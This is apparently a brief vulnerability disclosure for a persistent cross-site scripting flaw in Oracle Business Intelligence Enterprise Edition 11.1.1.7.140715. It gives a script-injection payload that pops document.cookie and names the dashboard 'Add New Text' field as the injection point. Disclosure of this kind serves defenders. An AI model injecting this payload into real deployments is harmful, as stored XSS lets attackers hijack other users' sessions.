Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 XSS

Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 XSS

Oracle Business Intelligence Enterprise Edition version 11.1.1.7.140715 suffers from a persistent cross site scripting vulnerability.

Stored XSS:

1
“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text